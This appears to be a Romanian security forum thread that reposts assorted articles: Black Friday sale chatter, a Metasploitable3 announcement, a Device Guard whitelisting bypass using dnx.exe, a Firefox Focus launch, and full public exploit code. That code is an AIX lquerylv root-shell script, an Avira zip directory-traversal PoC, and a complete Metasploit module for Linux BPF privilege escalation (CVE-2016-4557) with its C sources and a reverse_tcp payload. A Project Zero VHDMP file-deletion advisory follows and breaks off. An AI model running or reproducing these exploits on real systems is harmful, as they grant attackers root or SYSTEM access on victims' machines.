Nytro

PS: Multe reduceri false pe evomag...

A inceput la evomag. Edit: Am observat si reduceri fake dar si unele pe bune.

Mi se pare mie sau PCGarage deja nu prea merge?

Fake sau nu, exista posibilitatea ca unele produse chiar sa fie reduse. Am gasit asta: Desi Black Friday incepe oficial la ora 00:00, o parte din magazine au trimis deja ofertele catre o parte din clientii abonati la newsletter, in cazul in care ati ratat o oferta, mai jos am alcatuit o lista cu toate cataloagele disponibile. Lista va fi actalizata in timp real, asadar ramaneti pe pagina. De asemenea vom mentiona si ce produse merita cu adevarat dintre aceste oferte. Actualizriile se vor afla in partea de jos a listei, si vor fi notate cu [UPDATE]. evoMAG Anul acesta pe langa autoturism si alte 25000 de produse, se vor afla si apartamente! Vom reveni cu un catalog in curand! Emag – Microsoft Xbox ONE, 500 GB, stoc 500 de bucati la 599,99 de lei. – Televizor Star-Light 50DM5500, Full HD diagonala de 127CM, stoc 1.000 de bucati la 999,99 de lei. – Perie Rowenta CF9220D0, stoc 5.000 de bucăți la 99,99 de lei. – Anvelopa de iarna Orium 601 185/65 R15 88T, stoc de 3.000 de bucati la 99,99 de lei. – Combina frigorifica Arctic ANK305+, stoc de 1.000 de bucati la 699,99 lei. – Parfum Calvin Klein Euphoria pentru femei, stoc 5.000 de bucati la 119,99 de lei. – Laptop Lenovo IdeaPad cu procesor Intel Core i3, 4GB RAM, HDD 500GB,stoc de 1.000 de bucati la 999,99 de lei. – Samsung GALAXY S6 Edge, memorie 32GB, stoc de 600 de bucati la 1.699,99 de lei. – Tigaie Tefal 24 cm, teflonata, stoc de 8.500 de bucăți la 19,99 de lei. – Telefon Vonino Xylo X,Dual SIM, 8GB, stoc de 1.000 de bucati la 99,99 de lei. – SSD Kingston V300 la 199,99 lei, stoc de 850 de bucati. Rcs-Rds Oferta lor poate fi gasita aici http://www.rcs-rds.ro/goldfriday [UPDATE] Flanco Oferta celor de la Flanco poate fi gasita aici https://zonait.tv/galerie-catalog-flanco-de-black-friday-2016/ Link: https://zonait.tv/iata-ofertele-de-black-friday-2016-live/

Metasploitable3: An Intentionally Vulnerable Machine for Exploit Testing Blog Post created by sinn3r on Nov 15, 2016 Like • Show 2 Likes2 Comment • 0 Test Your Might With The Shiny New Metasploitable3 Today I am excited to announce the debut of our shiny new toy - Metasploitable3. Metasploitable3 is a free virtual machine that allows you to simulate attacks largely using Metasploit. It has been used by people in the security industry for a variety of reasons: such as training for network exploitation, exploit development, software testing, technical job interviews, sales demonstrations, or CTF junkies who are looking for kicks, etc If you are already a Metasploitable fan, you would have noticed that we haven't had a new vulnerable image since 2012. To be honest, when James and I took over the project, we didn't even know who was maintaining it anymore. So we decided to do something about it. After months of planning and building the vulnerable image from scratch, we have something for you all to play Unlike its predecessor, Metasploitable3 has these cool features: It is Open Source During development, we recognized one of the drawbacks of Metasploitable2 was maintenance. We figured since we want everyone in the community to play, the community should have the power to influence and contribute. This also allows the vulnerable image to constantly evolve, and hopefully will keep the VM fun to play. Metasploitable3 can be found as a Github repository here. Keep in mind, instead of downloading a VM like before, Metasploitable3 requires you to issue a few commands and build for Virtual Box (VMWare will be supported in the future soon). To do so, your machine must install the following requirements: Packer Vagrant Vagrant Reload Plugin VirtualBox To build automatically: Run the build_win2008.sh script if using bash. If you are using Windows, run build_win2008.ps1. If the command completes successfully, run "vagrant up". The the build process takes anywhere between 20 to 40 minutes, depending on your system and Internet connection. After it's done, you should be able to open the VM within VirtualBox and login. The default username is "vagrant" with password "vagrant". To build manually, please refer to the README documentation. If you have experience in making vulnerable images, or would like to suggest a type of exploitation scenario for Metasploitable3, your feedback is welcome! It is for People with Different Skills Levels Metasploitable2 back then was more of a test environment heavily for Metasploit. It was straight-forward to play, and it didn't take long to find the right exploit to use, and get a high privileged shell. But you see, we want to make you try a little harder than that First off, not every type of vulnerability on Metasploitable3 can be exploited with a single module from Metasploit, but some can. Also by default, the image is configured to make use of some mitigations from Windows, such as different permission settings and a firewall. For example, if you manage to exploit a service in the beginning, you will most likely be rewarded with a lower privileged shell. This part shouldn't be too difficult for young bloods who are new to the game. But if you want more than that, higher privileged services tend to be protected by a firewall, and you must figure out how to get around that. For special reasons, the firewall can be disabled if you set the MS3_DIFFICULTY environment variable: $ MS3_DIFFICULTY=easy vagrant up If the image is already built, you can simply open a command prompt and do: $ netsh advfirewall set allprofiles state off It Has Flags One very common thing about performing a penetration test is going after corporate data. Well, we can't shove any real corporate data in Metasploitable3 without any legal trouble, therefore we have introduced flags throughout the whole system. They serve as "data you want to steal", and each is in the form of a poker card image of a Rapid7/Metasploit developer, and is packaged in one of more of these ways: Obfuscation Strict permission settings File attributes Embedded files Getting your hands on these flags exercises your post exploitation muscle, and may require some level of reverse engineering knowledge. A hint about these flags can be found from one of the services. In the future, we will be publishing more blog posts about how to find these flags. It is Expandable In real world penetration testing, a lot of it involves being able to break into one machine, and leverage the information stolen from there against the next one. Stolen passwords and hashes are perfect examples for this. Instead of just having one virtual machine, our plan is to also have the capability to build multiple vulnerable images, and create a network of them. This allows the audience to have the opportunity to practice more post exploitation techniques, pivoting, and break into the next box. Although our first image is Windows, the planning part of the Linux version has already begun. If you would like to jump on this train, please feel free to leave a comment on Github, or contribute. And that's what our new toy is all about Last but not least, if you are trying out Metasploitable3 without Metasploit, either you are Neo from the Matrix, or you are nuts. Metasploit consists of thousands of modules, including exploits, auxiliary, post modules, and payloads that allows you to succeed in many kinds of attack scenarios. If you don't have this in your toolkit, please feel free to grab it here. Sursa: https://community.rapid7.com/community/metasploit/blog/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3

BYPASSING APPLICATION WHITELISTING BY USING DNX.EXE November 17, 2016 by enigma0x3 Over the past few weeks, I have had the pleasure to work side-by-side with Matt Graeber (@mattifestation) and Casey Smith (@subtee) researching Device Guard user mode code integrity (UMCI) bypasses. If you aren’t familiar with Device Guard, you can read more about it here: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/device-guard-deployment-guide. In short, Device Guard UMCI prevents unsigned binaries from executing, restricts the Windows Scripting Host, and it places PowerShell in Constrained Language mode. Recently, @mattifestation blogged about a typical Device Guard scenario and using theMicrosoft Signed debuggers WinDbg/CDB as shellcode runners. Soon after, @subtee released a post on using CSI.exe to run unsigned C# code on a Device Guard system. Taking their lead, I decided to install the Visual Studio Enterprise trial and poke around to see what binaries existed. After much digging, I stumbled across dnx.exe, which is the Microsoft .NET Execution environment. If you are curious, you can read more on dnx.exe here: https://blogs.msdn.microsoft.com/sujitdmello/2015/04/23/step-by-step-installation-instructions-for-getting-dnx-on-your-windows-machine/ In a Device Guard scenario, dnx.exe is allowed to execute as it is a Microsoft signed binary packaged with Visual Studio Enterprise. In order to execute dnx.exe on a Device Guard system (assuming it isn’t already installed), you will need to gather dnx.exe and its required dependencies, and somehow transport everything to your target (this is an exercise left up to the reader). With everything required now on our target host, we can now start down the path of bypassing Device Guard’s UMCI. Since dnx.exe allows for executing code in dynamic scenarios, we can use it to execute arbitrary, unsigned C# code. Fortunately, there is a solid example of this on Microsoft’s blog above. For example, we can create a C# file called “Program.cs” and add whatever C# code we want. To demonstrate the execution of unsigned code, we can keep things simple: To satisfy the requirements of dnx.exe, a Project.json file is required, which specifies some of the requirements when executing the code. For this PoC, the example “Project.json” file can be used from Microsoft’s blog here. As stated in their post, we can execute our C# by placing “Program.cs” and “Project.json” in a folder called “ConsoleApp” (this can obviously be renamed/modified). Now that we have our files, we can execute our C# using dnx.exe by going into the “ConsoleApp” folder and invoking dnx.exe on it. This is done on a PC running Device Guard: As you can see above, our unsigned C# successfully executed and is running inside of dnx.exe. Fortunately, these “misplaced trust” bypasses can be mitigated via code integrity policy FilePublisher file rules. You can read up on creating these mitigation rules here: http://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html You can find a comprehensive bypass mitigation policy here: https://github.com/mattifestation/DeviceGuardBypassMitigationRules Cheers! Matt Nelson Sursa: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

Introducing Firefox Focus – a free, fast and easy to use private browser for iOS Nick Nguyen November 17, 2016 Today, we’re pleased to announce the launch of Firefox Focus – a free, fast and easy to use private browser for iOS. Firefox Focus We live in an age where too many users have lost trust and lack meaningful controls over their digital lives. For some users, it seems as though your web activities can follow you everywhere – across devices, across accounts. To make matters worse, the web can often feel cluttered. That’s why we are introducing Firefox Focus. For the times when you don’t want to leave a record on your phone. You may be looking for information that in certain situations is sensitive – searches for engagement rings, flights to Las Vegas or expensive cigars, for example. And sometimes you just want a super simple, super fast Web experience – no tabs, no menus, no pop-ups. Firefox Focus gives you just that. Firefox Focus is set by default to block many of the trackers that follow you around the Web. You don’t need to change privacy or cookie settings. You can browse with peace of mind, feeling confident in the knowledge that you can instantly erase your sessions with a single tap – no menus needed. Firefox Focus Erase Button Much of what makes mobile web pages slow is the technology used to track users on the web. Because Firefox Focus blocks these trackers, it is likely you’ll notice a performance boost on the many sites that track your behavior. When you occasionally see a site that doesn’t work because it is dependent on tracking, and if you don’t mind that kind of tracking, Firefox Focus makes it easy to open your current site in either Firefox or Safari. We look forward to your feedback on Firefox Focus. You can download Firefox Focus from the App Store. Firefox Focus continues to operate as a Safari content blocker on iOS, and users will be able to take advantage of Tracking Protection on both Safari and Firefox Focus. Sursa: https://blog.mozilla.org/blog/2016/11/17/introducing-firefox-focus-a-free-fast-and-easy-to-use-private-browser-for-ios/

Toate au nevoie de Siri. Oare cati au acea porcarie activata?

Nici nu e prima oara cand se descopera asa ceva...

IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation #!/usr/bin/sh # # AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) # # This exploit takes advantage of known issues with debugging functions # within the AIX linker library. We are taking advantage of known # functionality, and focusing on badly coded SUID binaries which do not # adhere to proper security checks prior to seteuid/open/writes. # # The CVEs we will be taking advantage of: # - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows # local users to create or overwrite arbitrary files via a symlink attack on # the log file associated with the MALLOCDEBUG environment variable. # # - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does # not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE # environment variables, which allows local users to gain privileges by # leveraging a setuid-root program to create an arbitrary root-owned file # with world-writable permissions, related to libC.a (aka the XL C++ runtime # library) in AIX 5.3 and libc.a in AIX 6.1. # # - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary # File Writes In IBM AIX. # # In each instance of the aforementioned CVEs, IBM merely patched the binaries # which were reported in the original reports as being used for escalation of # the vulnerabilities. This allowed for the lquerylv binary to slip by their # patches and become an attack vector. # # Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ # # lqueryroot.sh by @hxmonsegur [2016 //RSL] ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') APP=$0 function usage { echo "Usage: $APP [1] | [2] | [3]" echo echo "1 - MALLOCDEBUG file write -> escalation" echo "2 - _LIB_INIT_DBG_FILE file write -> escalation" echo "3 - MALLOCBUCKETS file write -> escalation" echo echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL" exit } function CVE20091786 { echo "[*] Exporting MALLOCDEBUG environment variable" MALLOCTYPE=debug MALLOCDEBUG=report_allocations,output:/etc/suid_profile export MALLOCTYPE MALLOCDEBUG } function CVE20092669 { echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable" _LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=/etc/suid_profile export _LIB_INIT_DBG _LIB_INIT_DBG_FILE } function CVE20143074 { echo "[*] Exporting MALLOCBUCKETS environment variable" MALLOCOPTIONS=buckets MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile export MALLOCOPTIONS MALLOCBUCKETS } if [ -z "$1" ]; then usage exit 1 fi while [ "$1" != "" ]; do case $1 in 1 ) CVE20091786;; 2 ) CVE20092669;; 3 ) CVE20143074;; * ) usage break;; esac shift done if [ ! -x "/usr/sbin/lquerylv" ]; then echo "[-] lquerylv isn't executable. Tough luck." exit 1 fi echo "[*] Setting umask to 000" umask 000 echo "[*] Execute our vulnerable binary" /usr/sbin/lquerylv >/dev/null 2>&1 if [ ! -e "/etc/suid_profile" ]; then echo "[-] /etc/suid_profile does not exist and exploit failed." exit 1 fi echo "[*] Cleaning up /etc/suid_profile" echo > /etc/suid_profile echo "[*] Current id: `/usr/bin/id`" echo "[*] Adding payload" cat << EOF >/etc/suid_profile cp /bin/ksh $ROOTSHELL /usr/bin/syscall setreuid 0 0 chown root:system $ROOTSHELL chmod 6755 $ROOTSHELL rm /etc/suid_profile EOF echo "[*] Unsetting env" unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE echo "[*] Executing ibstat for fun and profit" /usr/bin/ibstat -a >/dev/null 2>&1 if [ ! -e "$ROOTSHELL" ]; then echo "[-] Rootshell does not exist and exploit failed." exit 1 fi echo "[*] Executing rootshell" $ROOTSHELL Sursa: https://www.exploit-db.com/exploits/40710/

Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution # Title : Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM) # Date : 08/11/2016 # Author : R-73eN # Tested on: Avira Antivirus 15.0.21.86 in Windows 7 # Vendor : https://www.avira.com/ # Disclosure Timeline: # 2016-06-28 - Reported to Vendor through Bugcrowd. # 2016-06-29 - Vendor Replied. # 2016-07-05 - Vendor Replicated the vulnerability. # 2016-09-02 - Vendor released updated version which fix the vulnerability. # 2016-11-08 - Public Disclosure # I would like to thank Avira security team for the quick response. # # Vulnerability Description: # When the Avira Launcher manual update imports a zip file doesn't checks for " ../ " # characters which makes it possible to do a path traversal and write anywhere in the system. # Vulnerability Replication # 1. Create a special crafted zip file with the python script attached. # 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory C:\ # 3. You can change the directory go to startup and when the user reboots the script will get executed or you can write a malicious dll to a program directory or # system32 directory which will get loaded and we gain remote command execution. # 4. Open avira free antivirus # 5. Go to update -> Manual Update # 6. Select the malicious file # 7. Directory traversal was sucessfull # Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q # POC: #!/usr/bin/python -w banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner import zipfile, sys if(len(sys.argv) != 2): print "[+] Usage : python exploit.py file_to_do_the_traversal [+]" print "[+] Example: python exploit.py test.txt" exit(0) print "[+] Creating Zip File [+]" zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w") zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat") zf.close() print "[+] Created xvdf_fusebundle.zip successfully [+]" # Fix: # Update to the latest version. Sursa: https://www.exploit-db.com/exploits/40741/

Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit) ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info={}) super( update_info( info, { 'Name' => 'Linux BPF Local Privilege Escalation', 'Description' => %q{ Linux kernel >=4.4 with CONFIG_BPF_SYSCALL and kernel.unprivileged_bpf_disabled sysctl is not set to 1, BPF can be abused to priv escalate. Ubuntu 16.04 has all of these conditions met. }, 'License' => MSF_LICENSE, 'Author' => [ 'jannh@google.com', # discovery 'h00die <mike@shorebreaksecurity.com>' # metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ [ 'CVE', '2016-4557' ], [ 'EDB', '39772' ], [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=808' ], [ 'URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7' ] ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultOptions' => { 'payload' => 'linux/x64/mettle/reverse_tcp', 'PrependFork' => true, 'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through }, 'DefaultTarget' => 1, 'DisclosureDate' => 'May 04 2016', 'Privileged' => true } )) register_options([ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]), OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 120 ]) ], self.class) end def check def check_config_bpf_syscall?() output = cmd_exec('grep CONFIG_BPF_SYSCALL /boot/config-`uname -r`') if output == 'CONFIG_BPF_SYSCALL=y' vprint_good('CONFIG_BPF_SYSCALL is set to yes') return true else print_error('CONFIG_BPF_SYSCALL is NOT set to yes') return false end end def check_kernel_disabled?() output = cmd_exec('sysctl kernel.unprivileged_bpf_disabled') if output != 'kernel.unprivileged_bpf_disabled = 1' vprint_good('kernel.unprivileged_bpf_disabled is NOT set to 1') return true else print_error('kernel.unprivileged_bpf_disabled is set to 1') return false end end def check_fuse?() lib = cmd_exec('dpkg --get-selections | grep ^fuse') if lib.include?('install') vprint_good('fuse is installed') return true else print_error('fuse is not installed. Exploitation will fail.') return false end end def mount_point_exists?() if directory?('/tmp/fuse_mount') print_error('/tmp/fuse_mount should be unmounted and deleted. Exploitation will fail.') return false else vprint_good('/tmp/fuse_mount doesn\'t exist') return true end end if check_config_bpf_syscall?() && check_kernel_disabled?() && check_fuse?() && mount_point_exists?() CheckCode::Appears else CheckCode::Safe end end def exploit def upload_and_compile(filename, file_path, file_content, compile=nil) rm_f "#{file_path}" if not compile.nil? rm_f "#{file_path}.c" vprint_status("Writing #{filename} to #{file_path}.c") write_file("#{file_path}.c", file_content) register_file_for_cleanup("#{file_path}.c") output = cmd_exec(compile) if output != '' print_error(output) fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile") end else vprint_status("Writing #{filename} to #{file_path}") write_file(file_path, file_content) end cmd_exec("chmod +x #{file_path}"); register_file_for_cleanup(file_path) end doubleput = %q{ #define _GNU_SOURCE #include <stdbool.h> #include <errno.h> #include <err.h> #include <unistd.h> #include <fcntl.h> #include <sched.h> #include <signal.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/prctl.h> #include <sys/uio.h> #include <sys/mman.h> #include <sys/wait.h> #include <linux/bpf.h> #include <linux/kcmp.h> #ifndef __NR_bpf # if defined(__i386__) # define __NR_bpf 357 # elif defined(__x86_64__) # define __NR_bpf 321 # elif defined(__aarch64__) # define __NR_bpf 280 # else # error # endif #endif int uaf_fd; int task_b(void *p) { /* step 2: start writev with slow IOV, raising the refcount to 2 */ char *cwd = get_current_dir_name(); char data[2048]; sprintf(data, "* * * * * root /bin/chown root:root '%s'/suidhelper; /bin/chmod 06755 '%s'/suidhelper\n#", cwd, cwd); struct iovec iov = { .iov_base = data, .iov_len = strlen(data) }; if (system("fusermount -u /home/user/ebpf_mapfd_doubleput/fuse_mount 2>/dev/null; mkdir -p fuse_mount && ./hello ./fuse_mount")) errx(1, "system() failed"); int fuse_fd = open("fuse_mount/hello", O_RDWR); if (fuse_fd == -1) err(1, "unable to open FUSE fd"); if (write(fuse_fd, &iov, sizeof(iov)) != sizeof(iov)) errx(1, "unable to write to FUSE fd"); struct iovec *iov_ = mmap(NULL, sizeof(iov), PROT_READ, MAP_SHARED, fuse_fd, 0); if (iov_ == MAP_FAILED) err(1, "unable to mmap FUSE fd"); fputs("starting writev\n", stderr); ssize_t writev_res = writev(uaf_fd, iov_, 1); /* ... and starting inside the previous line, also step 6: continue writev with slow IOV */ if (writev_res == -1) err(1, "writev failed"); if (writev_res != strlen(data)) errx(1, "writev returned %d", (int)writev_res); fputs("writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.\n", stderr); while (1) sleep(1); /* whatever, just don't crash */ } void make_setuid(void) { /* step 1: open writable UAF fd */ uaf_fd = open("/dev/null", O_WRONLY|O_CLOEXEC); if (uaf_fd == -1) err(1, "unable to open UAF fd"); /* refcount is now 1 */ char child_stack[20000]; int child = clone(task_b, child_stack + sizeof(child_stack), CLONE_FILES | SIGCHLD, NULL); if (child == -1) err(1, "clone"); sleep(3); /* refcount is now 2 */ /* step 2+3: use BPF to remove two references */ for (int i=0; i<2; i++) { struct bpf_insn insns[2] = { { .code = BPF_LD | BPF_IMM | BPF_DW, .src_reg = BPF_PSEUDO_MAP_FD, .imm = uaf_fd }, { } }; union bpf_attr attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = 2, .insns = (__aligned_u64) insns, .license = (__aligned_u64)"" }; if (syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) != -1) errx(1, "expected BPF_PROG_LOAD to fail, but it didn't"); if (errno != EINVAL) err(1, "expected BPF_PROG_LOAD to fail with -EINVAL, got different error"); } /* refcount is now 0, the file is freed soon-ish */ /* step 5: open a bunch of readonly file descriptors to the target file until we hit the same pointer */ int status; int hostnamefds[1000]; int used_fds = 0; bool up = true; while (1) { if (waitpid(child, &status, WNOHANG) == child) errx(1, "child quit before we got a good file*"); if (up) { hostnamefds[used_fds] = open("/etc/crontab", O_RDONLY); if (hostnamefds[used_fds] == -1) err(1, "open target file"); if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, hostnamefds[used_fds]) == 0) break; used_fds++; if (used_fds == 1000) up = false; } else { close(hostnamefds[--used_fds]); if (used_fds == 0) up = true; } } fputs("woohoo, got pointer reuse\n", stderr); while (1) sleep(1); /* whatever, just don't crash */ } int main(void) { pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) make_setuid(); struct stat helperstat; while (1) { if (stat("suidhelper", &helperstat)) err(1, "stat suidhelper"); if (helperstat.st_mode & S_ISUID) break; sleep(1); } fputs("suid file detected, launching rootshell...\n", stderr); execl("./suidhelper", "suidhelper", NULL); err(1, "execl suidhelper"); } } suid_helper = %q{ #include <unistd.h> #include <err.h> #include <stdio.h> #include <sys/types.h> int main(void) { if (setuid(0) || setgid(0)) err(1, "setuid/setgid"); fputs("we have root privs now...\n", stderr); execl("/bin/bash", "bash", NULL); err(1, "execl"); } } hello = %q{ /* FUSE: Filesystem in Userspace Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu> heavily modified by Jann Horn <jannh@google.com> This program can be distributed under the terms of the GNU GPL. See the file COPYING. gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello */ #define FUSE_USE_VERSION 26 #include <fuse.h> #include <stdio.h> #include <string.h> #include <errno.h> #include <fcntl.h> #include <unistd.h> #include <err.h> #include <sys/uio.h> static const char *hello_path = "/hello"; static char data_state[sizeof(struct iovec)]; static int hello_getattr(const char *path, struct stat *stbuf) { int res = 0; memset(stbuf, 0, sizeof(struct stat)); if (strcmp(path, "/") == 0) { stbuf->st_mode = S_IFDIR | 0755; stbuf->st_nlink = 2; } else if (strcmp(path, hello_path) == 0) { stbuf->st_mode = S_IFREG | 0666; stbuf->st_nlink = 1; stbuf->st_size = sizeof(data_state); stbuf->st_blocks = 0; } else res = -ENOENT; return res; } static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi) { filler(buf, ".", NULL, 0); filler(buf, "..", NULL, 0); filler(buf, hello_path + 1, NULL, 0); return 0; } static int hello_open(const char *path, struct fuse_file_info *fi) { return 0; } static int hello_read(const char *path, char *buf, size_t size, off_t offset, struct fuse_file_info *fi) { sleep(10); size_t len = sizeof(data_state); if (offset < len) { if (offset + size > len) size = len - offset; memcpy(buf, data_state + offset, size); } else size = 0; return size; } static int hello_write(const char *path, const char *buf, size_t size, off_t offset, struct fuse_file_info *fi) { if (offset != 0) errx(1, "got write with nonzero offset"); if (size != sizeof(data_state)) errx(1, "got write with size %d", (int)size); memcpy(data_state + offset, buf, size); return size; } static struct fuse_operations hello_oper = { .getattr = hello_getattr, .readdir = hello_readdir, .open = hello_open, .read = hello_read, .write = hello_write, }; int main(int argc, char *argv[]) { return fuse_main(argc, argv, &hello_oper, NULL); } } hello_filename = 'hello' hello_path = "#{datastore['WritableDir']}/#{hello_filename}" doubleput_file = "#{datastore['WritableDir']}/doubleput" suidhelper_filename = 'suidhelper' suidhelper_path = "#{datastore['WritableDir']}/#{suidhelper_filename}" payload_filename = rand_text_alpha(8) payload_path = "#{datastore['WritableDir']}/#{payload_filename}" if check != CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') end def has_prereqs?() def check_libfuse_dev?() lib = cmd_exec('dpkg --get-selections | grep libfuse-dev') if lib.include?('install') vprint_good('libfuse-dev is installed') return true else print_error('libfuse-dev is not installed. Compiling will fail.') return false end end def check_gcc?() gcc = cmd_exec('which gcc') if gcc.include?('gcc') vprint_good('gcc is installed') return true else print_error('gcc is not installed. Compiling will fail.') return false end end def check_pkgconfig?() lib = cmd_exec('dpkg --get-selections | grep ^pkg-config') if lib.include?('install') vprint_good('pkg-config is installed') return true else print_error('pkg-config is not installed. Exploitation will fail.') return false end end return check_libfuse_dev?() && check_gcc?() && check_pkgconfig?() end compile = false if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' if has_prereqs?() compile = true vprint_status('Live compiling exploit on system') else vprint_status('Dropping pre-compiled exploit on system') end end if compile == false # doubleput file path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'doubleput') fd = ::File.open( path, "rb") doubleput = fd.read(fd.stat.size) fd.close # hello file path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'hello') fd = ::File.open( path, "rb") hello = fd.read(fd.stat.size) fd.close # suidhelper file path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'suidhelper') fd = ::File.open( path, "rb") suid_helper = fd.read(fd.stat.size) fd.close # overwrite with the hardcoded variable names in the compiled versions payload_filename = 'AyDJSaMM' payload_path = '/tmp/AyDJSaMM' end # make our substitutions so things are dynamic suid_helper.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/, "return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/, 'exit(0);') print_status('Writing files to target') cmd_exec("cd #{datastore['WritableDir']}") upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil) upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_file} #{doubleput_file}.c -Wall" : nil) upload_and_compile('suidhelper', suidhelper_path, suid_helper, compile ? "gcc -o #{suidhelper_filename} #{suidhelper_filename}.c -Wall" : nil) upload_and_compile('payload', payload_path, generate_payload_exe) print_status('Starting execution of priv esc. This may take about 120 seconds') cmd_exec(doubleput_file) sec_waited = 0 until sec_waited > datastore['MAXWAIT'] do Rex.sleep(1) # check file permissions if cmd_exec("ls -lah #{suidhelper_path}").include?('-rwsr-sr-x 1 root root') print_good('got root, starting payload') print_error('This exploit may require process killing of \'hello\', and \'doubleput\' on the target') print_error('This exploit may require manual umounting of /tmp/fuse_mount via \'fusermount -z -u /tmp/fuse_mount\' on the target') print_error('This exploit may require manual deletion of /tmp/fuse_mount via \'rm -rf /tmp/fuse_mount\' on the target') cmd_exec("#{suidhelper_path}") return end sec_waited +=1 end end def on_new_session(session) # if we don't /bin/bash here, our payload times out # [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:37022) at 2016-09-27 14:15:04 -0400 # [*] 192.168.199.130 - Meterpreter session 2 closed. Reason: Died session.shell_command_token('/bin/bash') super end end Sursa: https://www.exploit-db.com/exploits/40759/

Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138) /* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=915 Windows: VHDMP ZwDeleteFile Arbitrary File Deletion EoP Platform: Windows 10 10586 and 14393. No idea about 7 or 8.1 versions. Class: Elevation of Privilege Summary: The VHDMP driver doesn’t safely delete files leading to arbitrary file deletion which could result in EoP. Description: The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. There are numerous places where the driver calls ZwDeleteFile without specifying OBJ_FORCE_ACCESS_CHECK. This can be abused to delete any arbitrary file or directory on the filesystem by abusing symbolic links to redirect the delete file name to an arbitrary location. Also due to the behaviour of ZwDeleteFile we also don’t need to play games with the DosDevices directory or anything like that, the system call opens the target file without specifying FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE flags, this means it’s possible to use a mount point even to redirect to a file due to the way reparsing works in the kernel. Some places where ZwDeleteFile is called (based on 10586 x64 vhdmp.sys) are: VhdmpiDeleteRctFiles VhdmpiCleanupFileWrapper VhdmpiInitializeVhdSetExtract VhdmpiCtCreateEnableTrackingRequest VhdmpiMultiStageSwitchLogFile 